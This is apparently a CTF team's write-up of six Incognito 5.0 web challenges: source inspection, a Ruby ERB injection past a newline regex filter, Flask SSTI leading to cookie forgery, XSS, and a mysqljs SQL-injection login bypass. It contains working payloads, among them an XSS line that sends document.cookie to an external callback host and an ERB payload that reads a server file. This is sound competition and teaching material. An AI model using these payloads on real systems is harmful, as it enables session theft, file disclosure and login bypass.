# Description

Recently our team HCS (Heroes Cyber Security), the official cybersecurity community of Institut Teknologi Sepuluh Nopember, participated in Incognito 5.0 CTF 2024. We secured 1st place out of 275 teams. Thanks to my mentor @daffainfo, who solved the challenges together with me.

[toc]

# Warmup

> You can express your fondness for the poem by the statesman by telling the server that you loved it.
> http://statesman.ictf5.ninja/

## TL;DR

View the source at `/src/App.jsx` to get the flag.

## Solve

The website looks like this.

![warm1](https://hackmd.io/_uploads/ryBI792x0.png)

We inspected the page and searched every loaded source file for the flag, and found it in `/src/App.jsx`.

![warmflag](https://hackmd.io/_uploads/rJHKX5hgA.png)

```
ictf{wElc0Me_T0_1ctf}
```

# Roleplay

> Guess what you're about to play with?
> http://keyboard-roleplay.ictf5.ninja

## TL;DR

View the source of the website to get the flag.

## Solve

The website looks like this.

![roleplay1](https://hackmd.io/_uploads/ry-0m5he0.png)

Viewing the source shows a script loaded from `/static/js/bundle.js`, and the flag is inside it.

![roleplayflag](https://hackmd.io/_uploads/Sk7fE9nlA.png)

```
ictf{R0l3_Play3r_G0t_P0w3r}
```

# Embed flow

> This guy wants you to guess his favorite programming language, but missed setting up the pattern correctly.
> http://embed-flow.ictf5.ninja/

## TL;DR

Bypass the input filter `/^[0-9a-z\n ]+$/i` in front of a Ruby (ERB) template injection: in Ruby, `^` and `$` match at line boundaries, so a newline lets a forbidden line through.

## Solve

Sending the payload `{{7*7}}` gives a response like this.

![embed-1](https://hackmd.io/_uploads/ByriNq2lC.png)

We then found a writeup describing the same filter: [SSTI Bypass Filter](https://blog.devops.dev/ssti-bypass-filter-0-9a-z-i-08a5b3b98def). The filter `/^[0-9a-z\n ]+$/i` looks like it only lets alphanumeric input through, but in Ruby `^` and `$` anchor to the start and end of a *line*, not of the whole string (the string anchors are `\A` and `\z`). As long as one line of the input consists only of allowed characters, the regex matches and the whole input, ERB tags included, reaches the template engine. So we wrap the ERB payload `<%= 3 * 3 %>` between two harmless lines and URL-encode it (`%0A` is the newline):

```
test%0A%3C%25%3D%203%20%2A%203%20%25%3E%0Atest
```

![embed-2](https://hackmd.io/_uploads/ryRWH5nxR.png)

And it works!

![embed-3](https://hackmd.io/_uploads/BkPrH93xC.png)

Next, we make a payload that reads the flag on the server.
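Before the flag payload, a quick check of why the newline bypass works. This is an added example, not code from the writeup or from the challenge (whose Ruby source is not shown here). Ruby's `^` and `$` are line anchors by default, which is exactly what JavaScript's `m` flag does, so the Ruby filter is emulated with `/m`; Ruby's string anchors `\A` and `\z` correspond to JavaScript's `^` and `$` without `/m`. The filter regex is the one quoted above; the sample inputs are constructed.

```javascript
// Added example: emulate the Ruby filter /^[0-9a-z\n ]+$/i and show why a
// newline-wrapped ERB payload passes it. Ruby's ^ and $ are line anchors,
// which JavaScript expresses with the `m` flag.
const LINE_ANCHORED = /^[0-9a-z\n ]+$/im;
// The fixed filter, anchored to the whole string (Ruby: /\A[0-9a-z\n ]+\z/i).
const STRING_ANCHORED = /^[0-9a-z\n ]+$/i;

// True when the filter accepts the input (Ruby's `input =~ re` matches anywhere).
function filterAllows(re, input) {
  return re.test(input);
}

// The URL-encoded payload from the solve, decoded the way a web framework
// decodes a query or body parameter.
const ENCODED_PAYLOAD = "test%0A%3C%25%3D%203%20%2A%203%20%25%3E%0Atest";
function decodePayload(encoded) {
  return decodeURIComponent(encoded);
}

// Run every candidate input through both filters.
function evaluate(inputs) {
  return inputs.map((input) => ({
    input,
    lineAnchored: filterAllows(LINE_ANCHORED, input),
    stringAnchored: filterAllows(STRING_ANCHORED, input),
  }));
}

// Constructed sample inputs.
const SAMPLES = [
  "ruby",                          // harmless: both filters accept
  "<%= 3 * 3 %>",                  // ERB on a single line: both filters reject
  decodePayload(ENCODED_PAYLOAD),  // "test\n<%= 3 * 3 %>\ntest": only the line-anchored filter accepts
];

for (const r of evaluate(SAMPLES)) {
  console.log(JSON.stringify(r.input), "line-anchored:", r.lineAnchored, "string-anchored:", r.stringAnchored);
}
```

The third sample is accepted by the line-anchored filter only because its first line, `test`, matches on its own; the string-anchored version rejects it because `<`, `%`, `=`, `*` and `>` are outside the character class.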
```
test%0A%3C%25%3D%20File%2Eopen%28%27flag%2Etxt%27%29%2Eread%20%25%3E%0Atest
```

Decoded, this is `test`, a newline, `<%= File.open('flag.txt').read %>`, a newline and `test` again.

![embed-4](https://hackmd.io/_uploads/r13vS53x0.png)

And we got the flag.

![embed-flag](https://hackmd.io/_uploads/HJi_H53eC.png)

```
ictf{ruby_r3g3x_n3w_l1n3_4l3rt}
```

# Ssssteal

> A beginner developer has designed a note-taking website to test their coding skills. Could you explore its features to assess its security posture?
> http://ssssteal.ictf5.ninja/

## TL;DR

Bug chaining: an SSTI leaks the Flask `SECRET_KEY`, which lets us forge the session cookie and exploit an IDOR.

## Solve

The website looks like this.

![steal-1](https://hackmd.io/_uploads/HJI4I5nlR.png)

I registered with the username `test+{{7*7}}`, and the user dashboard turned out to be vulnerable to SSTI.

![steal-2](https://hackmd.io/_uploads/SJgp_893lC.png)

I created some posts to find other endpoints, and the numeric post IDs made me wonder whether the website was vulnerable to IDOR.

![steal-3](https://hackmd.io/_uploads/BJZTI53xR.png)

I tried changing the ID.

![steal-4](https://hackmd.io/_uploads/rkrA893eR.png)

Looking at the cookie in the request, it is clearly a Flask session cookie, so `flask-unsign` can be used to craft a new one.

![steal-5](https://hackmd.io/_uploads/rytzD9hxR.png)

My conclusion: dump the application config with `{{config}}` to get the secret key, then sign a new cookie with it. I created a new account with that payload as the username to leak the secret key.

![steal-6](https://hackmd.io/_uploads/H1H8P52lR.png)

Use `flask-unsign` to sign the new cookie.

![steal-7](https://hackmd.io/_uploads/Hk-YD5hgC.png)

Paste it into the request, and we got the flag.

![steal-flag](https://hackmd.io/_uploads/HkP9DcnxA.png)

```
ictf{J1nj4_J0y_R1d3_W1th_C00k13s}
```

# Xssplode

> This seems to be a secure method for sanitizing user inputs and then passing through eval.
> http://xssplode.ictf5.ninja/

## TL;DR

Break out of the JSON string to get XSS, then send the admin's cookie to a callback server to get the flag.

## Solve

The website looks like this.

![xss-1](https://hackmd.io/_uploads/ryzXdqhlR.png)

Given the title, we were sure we just needed to break out of the JSON and get the XSS to fire. We managed to escape the JSON like this.
![xss-2](https://hackmd.io/_uploads/BJ28d93gR.png)

The XSS fires, but for some reason the `webhook` callback did not work, so I used `interactsh` as an alternative callback.

```
<img src=x onerror=location.href='//mqpeejstumljrxrvzclxdmxcygrho766f.oast.fun/?x='+document.cookie>
```

Send the payload to the server.

![xss-3](https://hackmd.io/_uploads/SyHpd5nlC.png)

And we got the flag.

![xss-flag](https://hackmd.io/_uploads/ryA1FqheA.png)

```
ictf{4dm1n_kn3w_h0w_t0_c0mm3n7}
```

# CatExpress

> The cat believed she created a secure login page for her owner. But did she?
> http://catexpress.ictf5.ninja/

## TL;DR

Unseen SQL injection in mysqljs / Node.js: object values passed to `?` placeholders are not escaped as literals.

## Solve

Source.js:

```js
const express = require("express");
const bodyParser = require("body-parser");
const createConnectionWithRetry = require("./db");

const app = express();
const port = 80;

// extended: true parses bracket notation (a[b]=1) into nested objects
app.use(bodyParser.urlencoded({ extended: true }));
app.use(express.static("public"));

async function startServer() {
  try {
    const connection = await createConnectionWithRetry();

    app.get("/", (req, res) => {
      res.sendFile(__dirname + "/index.html");
    });

    app.get("/login", (req, res) => {
      res.sendFile(__dirname + "/login.html");
    });

    app.post("/auth", function (request, response) {
      var username = request.body.username;
      var password = request.body.password;

      if (username && password) {
        // values are bound with ? placeholders, but their type is never checked
        connection.query(
          "SELECT * FROM accounts WHERE username = ? AND password = ?",
          [username, password],
          function (error, results, fields) {
            if (error) {
              console.error("Error occurred:", error);
              return response.status(500).send("Internal server error");
            }
            if (results.length > 0) {
              response.redirect("/?message=ictf{f4k3_fl4g}");
            } else {
              response.redirect("/?message=Invalid%20credentials");
            }
          },
        );
      } else {
        response.send("Please enter Username and Password!");
      }
    });

    app.listen(port, () => {
      console.log(`Server running at http://localhost:${port}/`);
    });
  } catch (error) {
    console.error("Failed to start the server:", error);
  }
}

startServer();
```

We got a login form.
![cat-1](https://hackmd.io/_uploads/rJc3YqnlC.png)

At first we tried many payloads that might trigger an error, but none of them worked. Then we found an interesting writeup about this class of SQL injection, called [Unseen SQL Injection](https://flattsecurity.medium.com/finding-an-unseen-sql-injection-by-bypassing-escape-functions-in-mysqljs-mysql-90b27f6542b4). Honestly, this was the first time I had heard of it too lol :joy:

The code snippet in that writeup is very similar to the challenge's `connection.query(...)` call in the `/auth` handler.

![cat-2](https://hackmd.io/_uploads/HJ3Yq93gC.png)

According to the writeup, an attacker can bypass the escaping with the payload `password[password]=1`. Because `bodyParser.urlencoded({ extended: true })` parses bracket notation, `password` arrives as the object `{ password: "1" }` instead of a string. mysqljs escapes an object bound to a `?` placeholder as `` `password` = '1' ``, so the condition becomes `password = \`password\` = '1'`, which MySQL evaluates as `(password = password) = '1'`, i.e. true for every row.

![cat-3](https://hackmd.io/_uploads/H1V3c5heA.png)

So we used this payload:

```
username[username]=1&password[password]=1
```

And we got the flag.

![cat-flag](https://hackmd.io/_uploads/H1ugoc2gR.png)

```
ictf{c4t_w4s_w4171ng_f0r_y0u}
```
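To see the exact SQL that the challenge's `/auth` handler would send, here is an added example. It is not code from the challenge, from body-parser or from the mysqljs project: `parseBody()` is a minimal stand-in for what `body-parser` with `extended: true` (the `qs` module) does for one level of bracket notation, and `escape()`/`format()` re-implement the documented escaping behaviour of `sqlstring`, the library mysqljs uses for `?` placeholders (a string becomes a quoted literal, an object becomes `` `key` = 'value' `` pairs). The request bodies are constructed, and `buildAuthQuerySafe()` is a hypothetical hardened variant, not the challenge's fix.

```javascript
// Added example: reproduce the "unseen" SQL injection offline by re-implementing
// the relevant subset of body-parser (qs) parsing and sqlstring escaping.

// Parse "a=1&b[c]=2" into { a: "1", b: { c: "2" } } (one level of nesting is enough here).
function parseBody(body) {
  const out = {};
  for (const pair of body.split("&")) {
    if (!pair) continue;
    const [rawKey, rawValue = ""] = pair.split("=");
    const key = decodeURIComponent(rawKey.replace(/\+/g, " "));
    const value = decodeURIComponent(rawValue.replace(/\+/g, " "));
    const nested = key.match(/^([^[\]]+)\[([^[\]]+)\]$/);
    if (nested) {
      out[nested[1]] = Object.assign(out[nested[1]] || {}, { [nested[2]]: value });
    } else {
      out[key] = value;
    }
  }
  return out;
}

// Quote a string literal the way sqlstring does (its escape table for the common characters).
function escapeString(val) {
  const escaped = String(val).replace(/[\0\b\t\n\r\x1a"'\\]/g, (ch) => {
    switch (ch) {
      case "\0": return "\\0";
      case "\b": return "\\b";
      case "\t": return "\\t";
      case "\n": return "\\n";
      case "\r": return "\\r";
      case "\x1a": return "\\Z";
      default: return "\\" + ch;
    }
  });
  return "'" + escaped + "'";
}

// Quote an identifier: `name`, with embedded backticks doubled.
function escapeId(val) {
  return "`" + String(val).replace(/`/g, "``") + "`";
}

// Escape one placeholder value. The object branch is the "unseen" part:
// { password: "1" } becomes `password` = '1', an SQL expression, not a literal.
function escape(val, stringifyObjects = false) {
  if (val === undefined || val === null) return "NULL";
  switch (typeof val) {
    case "boolean": return val ? "true" : "false";
    case "number": return String(val);
    case "object":
      if (stringifyObjects) return escapeString(String(val)); // the mysqljs `stringifyObjects: true` option
      return Object.keys(val)
        .map((k) => escapeId(k) + " = " + escape(val[k], true))
        .join(", ");
    default: return escapeString(val);
  }
}

// Substitute ? placeholders left to right, as connection.query(sql, values) does.
function format(sql, values, stringifyObjects = false) {
  let i = 0;
  return sql.replace(/\?/g, () => (i < values.length ? escape(values[i++], stringifyObjects) : "?"));
}

const AUTH_SQL = "SELECT * FROM accounts WHERE username = ? AND password = ?";

// The challenge's /auth handler, reduced to the SQL it would send.
function buildAuthQuery(body) {
  const { username, password } = parseBody(body);
  return format(AUTH_SQL, [username, password]);
}

// Hypothetical hardened variant: refuse anything that is not a string before it reaches the driver.
function buildAuthQuerySafe(body) {
  const { username, password } = parseBody(body);
  if (typeof username !== "string" || typeof password !== "string") {
    throw new TypeError("username and password must be strings");
  }
  return format(AUTH_SQL, [username, password]);
}

// Constructed request bodies: a normal login and the bypass from the solve.
console.log(buildAuthQuery("username=admin&password=secret"));
console.log(buildAuthQuery("username[username]=1&password[password]=1"));
```

For the bypass body the query becomes ``SELECT * FROM accounts WHERE username = `username` = '1' AND password = `password` = '1'``, which matches every row, so `results.length > 0` and the handler redirects with the flag. Either a type check like `buildAuthQuerySafe()` or the driver's `stringifyObjects: true` option (which turns the object into the literal `'[object Object]'`) closes the hole.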